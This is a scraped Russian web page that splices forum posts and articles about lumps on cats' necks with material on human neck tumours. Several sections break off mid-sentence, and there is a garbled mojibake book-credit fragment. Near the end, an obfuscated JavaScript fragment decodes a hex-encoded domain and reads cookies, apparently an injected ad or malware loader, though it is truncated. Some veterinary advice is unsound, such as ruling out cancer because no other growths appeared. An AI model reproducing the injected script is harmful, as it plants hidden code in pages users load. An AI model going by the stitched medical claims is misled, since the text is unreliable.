шишка на шее сбоку у кота

У кота под шеей странные шишки

Здравствуйте. У меня вопрос к кошатникам. В последнее время,у моего кота,под шеей появились шишки. Дело в том,что раньше у него на задней лапе была шишка,но она то лопалась,то надувалась,кровоточила. Вот сейчас на лапе этой шишки уже нет,а на шее появились две. У младшей сестры моего кота таких шишек очень много,а у нас впервые. Вот теперь не знаем,как убрать эти шишки. Кошатники,помогите и объясните пожалуйста что с ним. Заранее спасибо!

к сожалению, весьма вероятно.... но есть еще и аллергические шишки, и гормональные. при последних, их расположение симметричное

У моего знакомого кошка, у неё тоже шишки нащупал, понес к ветеринару. Ну тот сказал что опухоли какие то, надо операцию делать. Её делать не стали, по причине, что может не перенести. Кошка живет уже 4-ый год).

ой! у моей в 17 такая появилась, на горле. до 19 росла и росла. довольно твердая, н оей не болезненная. доросла до того, что ей уже трудно глотать было. когда мурлыкала - хрипела

Я уже писала вам, что нужно срочно показать кота врачу. По описанию никто вам в инете диагноз не поставит. Кроме деревенских теток, которые посоветуют вам лечить его "дегтеревым" мылом....

Несите. Узнаете диагноз. Возможно это спокойно лечится. Не затягивайте. Плюс коты спокойно доживают и до 20 лет, поэтому в 16 делают операции и если у врача руки не из ж..., то проживет еще долго даже если это были опухоли.

У меня коту год, тоже появилась на шее шишка под кожей. он задней лапой ее почесал - она лопнула. Теперь дырка на шее, носила к ветеринару - ничего толком не сказали. прописали левомеколь! не знаю, поможет или не! Даже зашивать не стали

У моего кота я обнаружила огромную шишку под шеей, у него изменилось поведение, на руки он не хочет идти, и ╚ кричит╩ не своим голосом если пытаюсь прощупать её! Кто знает что это? Помогите пожалу

Источник

Опухоль на шее. Опасно ли?

Опухоль на шее может появиться вследствие различных причин. Она бывает доброкачественной и злокачественной. Лечение в каждом конкретном случае индивидуально. Рассмотрим основные виды опухолей с подобной локализацией.

Классификация опухолей на шее

органные (возникают в органе, который находится в области шеи; как правило, это злокачественные образования, сохраняющие структурные элементы нормального органа);

Доброкачественные образования на шее

В области шеи опухоль формируется из эпителия. Образование имеет бледный, коричнево-черный цвет, небольшие размеры. Иногда возвышается над кожей на широком основании или тонкой ножке. Папилломы склонны к ороговению.

Подобные образования не беспокоят. Может появиться боль только в результате повреждения или воспаления. Папилломы удаляют из косметических соображений, а также в случаях изъявления.

Формируются из жировой ткани. Чаще всего локализуются на задней части шеи около волос. Иногда достигают больших размеров.

Липомы представляют собой мягкие образования с гладкой блестящей или дольчатой поверхностью. Безболезненны и подвижны. Лечение только оперативное.

Развиваются из соединительной ткани. Локализуются в боковых треугольниках шеи. Фибромы бывают узловыми (капсулированными) и диффузными (без капсулы). Лечение только оперативное. Иногда – в сочетании с радиотерапией.

Встречаются очень редко. Локализуются чаще всего в верхнем отделе шеи. Образование имеет плотную структуру, гладкую и блестящую поверхность. При нажатии может чувствоваться боль. Чтобы дифференцировать невриному, делают биопсию. Лечение только оперативное.

Злокачественные опухоли на шее

рак ротоглотки (опухоль поражает основание языка, мягкое небо, заднюю и боковые стенки глотки; при визуальном осмотре образование не заметно);

Опухоль н

Источник

Рак шеи

Рак шеи возникает у людей после 59 лет и является очень опасным видом опухолей. Опухоль на шее может оказаться очень агрессивной, так как быстро растет, дает большое количество метастаз и трудно лечится. Рак шеи возникает по ряду многих причин. Опухоли в районе шеи могут быть доброкачественными и злокачественными. Злокачественные довольно трудно поддаются лечению.

Более половины пациентов со злокачественными опухолями шеи без метастазов, и менее трети с опухолью, которая дала метастазы на лимфатические узлы или другие органы, могут жить около пяти лет. Пожилые люди чаще всего проживают дольше при условии ремиссии болезни и без признаков рецидива, чем люди в более молодом возрасте.

Опухоли шеи

Опухоль в области шеи может быть злокачественной и доброкачественной формы. Это могут быть опухоли, которые возникают справа или слева на шее, либо сразу с двух сторон, не дают болезненных ощущений. Это лимфангиома, которую относят к доброкачественным опухолям лимфатических узлов. Её легко обнаружить и прощупать, опухоль мягкая, податливая, не дает болезненных ощущений. В случае, если опухоль на шее не уменьшается в течении нескольких недель, у вас повышена температура тела, следует сразу обратиться к врачу и обследовать ее. Лимфангиому можно вылечить рентгенотерапией, но чаще всего ее удаляют с помощью операции.

Опухоли на шее могут возникать и спереди, они связаны с заболеваниями щитовидной железы. Такие образования чаще всего можно встретить у детей. Щитовидная железа увеличивается из-за нарушений функций эндокринной системы. Следует обратиться за помощью в клинику, так как это может быть признаком сахарного диабета или другого заболевания. Обнаружить увеличение железы довольно просто, так как в здоровом состоянии ее сложно нащупать.

Папилломы – данная опухоль образуется из эпителия, как правило, бледного коричнево-черно

Источник

Подкожные шишки у кошек

Казалось бы - такое осторожное создание! Но в нашем мире никто не застрахован от недуга. Один из самых частых - это образование, так называемые подкожные шишки у кошек.

Физический осмотр

Если вы заметили, что у котенка шишка, новообразование, опухоль, необходимо провести осмотр котенка на предмет других новообразований, которые появиться могут где угодно – на любой части тела. Просто обследуйте нежными, поглаживающими движениями рук весь кожный покров животного, стараясь обнаружить еще какие-нибудь странные наросты и новообразования. Нащупав еще какую-нибудь «опухоль» убедитесь, что этот объект действительно не предусмотрен анатомией. Для этого, эту область тела необходимо осмотреть с другой стороны и только потом делать выводы. В случае если шишка присутствует и с другой стороны тела то, скорее всего, это просто какая-нибудь анатомическая деталь, однако визуальный осмотр лишним не будет.

Основные причины возникновения шишек

Шишка или иное новообразование может указывать на раковую опухоль. В этом случае необходимо как можно быстрее обратиться в клинику, т.к. Дорога становится каждая минута. Чем скорее вы покажете животное ветеринару, тем выше вероятность выздоровления вашего любимца. Однако шишки или опухоли, которые были обнаружены на теле кота/кошки, могут указывать и на другие недуги: киста, увеличенные лимфатические узлы, кровоизлияния, инородный предмет или опухоль тканей, грыжа, абсцесс.

Также причиной для беспокойства может послужить следующее: частое почесывание тела, постоянное вылизывание, покраснения на коже, выпадающая шерсть, засаленная шерсть, шелушение кожи, инфекция. Необходимо осмотреть шерсть на предмет паразитов. Ухудшение состояния шерсти у кошек также может свидетельствовать о неправильном питании или внутреннем заболевании кошки. Правильную работу сердца и легких оценить

Источник

Шишка на шее сзади или около позвоночника или на руке под кожей: поможем разобраться в этой напасти!

Такая внезапная находка вызывает острую панику: что это, откуда, опасно ли?! Уверяем, очень много людей замечают, что иногда под кожей появляются шишки: сзади на шее, на руке или ноге и даже на спине около позвоночника. Скорее всего, такие шишки даже не дают о себе знать, и обнаруживаются совершенно случайно. Не спешите ставить себе страшный диагноз: мы поможем разобраться в формах и происхождениях таких шишек!

Проблема: шишка на шее сзади

Шишки на шее сзади (так называемый «бизоний горб») — частые спутники женщин от 35 и старше. Предпосылкой этого может быть уплотнение мышц из-за физической работы или усиление работы надпочечников из-за стрессовых ситуаций. Шишки, заработанные физическими упражнениями, удалить сложно: мышечную массу не убрать даже похудением. Уменьшить этот мышечный желвак можно только прекращением физического труда.

Шишка на шее сзади может быть проявлением остеохондроза, который, напротив, появляется из-за сидячего образа жизни и отсутствия физических упражнений. Часто шишкисопровождаются головной болью, усталостью, хрустом и болью в плечах.

Что делать: занимайтесь лечебной гимнастикой, запишитесь в бассейн, обратитесь к массажисту, подберите жесткий матрас, чаще гуляйте пешком.

Это может быть и проявлением фибролипомы, то есть когда разрастается плотная жировая ткань. Такое можно удалить хирургическим путем. Если шишка находится близко к волосяному покрову, то это может быть атерома — киста сальной железы, которая также убирается хирургами. В некоторых случаях такое образование может быть симптомом кисты шеи. Помните: любые образования в районе шеи нужно показать хирургу, чтобы исключить вероятность злокачественных опухолей!

Проблема:шишка под кожей на бедре

кот ты самый лучший день
уФЙИЙ, УЛБЪЛЙ, РЕТЕЧПДЩ, РЕТЕУЛБЪЩ --------------------------------------------------------------------- лОЙЗБ: в.ч.ъБИПДЕТ. йЪВТБООПЕ йЪДБФЕМШУФЧП "дЕФУЛБС МЙФЕТБФХТБ", нПУЛЧБ, 1981 OCR & SpellCheck: Zmiy (zmiy@inbox.ru), 3 БЧЗХУФБ 2002 ЗПДБ ------------

Случайно обнару

Источник

Здравствуйте... сегодня случайно обнаружила большую шишку в районе железок у моего кота. Не могу сказать, что его это беспокоит. Он кушает, играет и нос мокрый. Может до поры до времени? у меня 5 кошек, поэтому, к сожалению, не могу сказать точно как давно она. Но точно, что пару дней назад ее не было. Спасибо большое заранее!

Если вы имеете в виду образование в области лимфоузлов, то это может быть лимфаденопатия (патология лимфоузлов) или абсцесс в результате кусаной раны, не исключено также новообразование. Нужно показать кота врачу, чтобы установить диагноз, лечение зависит от диагноза.

Спасибо большое. сегодня были в ветеринарной клинике. Сначала ему сделали рентген, потом взяли пункцию и показали половину шприца гноя с кровью. Сказали, что это что-то вроде абсцесса в результате драки, затем ему вкололи какой-то антибиотик и сказали, что он будет действовать 15 дней. Это мне показалось очень странным. Так же нам дали таблетки synulox (мы живем в Испании), которые нужно принимать 5 дней. и не прочистив отправили домой. В результате у нас образование такого же размера. Пройдет ли оно с таким лечением? еще раз благодарю!

Возможно, вам сделали Конвению - это пролонгированный антибиотик, он действует две недели. Хотя дополнение синулоксом не совсем логично, спектр действия у них примерно одинаковый. Обязательна санация очага поражения - это ускорит выздоровление и уменьшит вероятность рецидива. Если есть объемная полость, можно расшрить отверстие, обеспечив сток эсккудата, это позволит также промывать полость антисептиками и вводить туда антибактериальные мази.

больная кошка ушла из дома
Всю жизнь я очень любила животных, и сколько себя помню, всегда у меня воспитывались какие-нибудь птенцы, щенята, зайчата…

Мне нравилось, когда меня дома встречали раскрытые рты галчат, сорок, когда серенькие желтор

window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="9920",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,

Источник

У кота шишка

Здравствуйте, у меня есть кот-перс,ему 19 лет.У него года 3-4 назад образовалась шишка. Сейчас она большая, круглая, с синим отливом, мягкая(можно взять в руку), наполнена жидкостью. Кота никак не беспокоит, только он ее иногда чешет. Сегодня он ее расковырял, она лопнула, уменьшилась и как будто повисла. Ветеринары (не видя кота) сказали, что трогать ее не надо, так как кот старый и она его не беспокоит. Скажите пожалуйста, что это может быть? Спасибо. Елена

Ответ ветеринара

Если это паховая область, то шишка может быть результатом воспаления лимфоузла. Если это живот, то там совершенно иные механизмы проявления новообразований.

Вы пишите, что из шишки, видимо, вышло какое-то содержимое? Что это было? Гнойные массы, или иная субстанция, более плотной консистенции со сгустками? Если неприятный запах от этого места? Заочно давать рекомендации, не имея большей конкретики — очень рискованно. 19 лет — приличный возраст для питомца кошачьих кровей.

Тем не менее — шишку обрабатывать перекисью водорода и присыпать стрептоцидом — это однозначно. Если было нарушение целостности кожного покрова — есть риск попадания инфекции. Как поведет себя новообразование дальше — вопрос большой и зависит, опять-таки от точного места расположения, ну и от установления правильного диагноза. А сделать это невозможно, не имея более конкретного описания. В любом случае — если за столько лет не появились подобные образования на других местах — это не онкология. Давайте вы более конкретно опишите, в каком месте расположена опухоль, что из нее вышло, аппетит и поведение кота. А там уже будет более понятно, что это такое.

Продолжение темы

У кота шишка находится над лапой,на лопатке.Она не прикрепляется к телу,ее легко можно поднять от тела.Содержимого мы не видели,

Источник